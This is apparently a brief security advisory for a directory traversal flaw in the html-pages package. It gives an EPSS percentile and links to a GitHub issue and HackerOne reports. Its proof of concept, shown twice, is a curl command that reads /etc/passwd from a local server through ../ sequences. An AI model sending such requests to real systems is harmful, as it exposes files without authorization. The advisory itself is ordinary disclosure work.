EPSS
Percentile
76.7%
html-pages is vulnerable to directory traversal attacks. A malicious user can obtain access to files on the system by prepending ../ in the url or curl request such as $ curl -v --path-as-is http://127.0.0.1:8000/../../../../../etc/passwd
../
$ curl -v --path-as-is http://127.0.0.1:8000/../../../../../etc/passwd
github.com/danielcardoso/html-pages/issues/2
hackerone.com/reports/306607
hackerone.com/reports/330356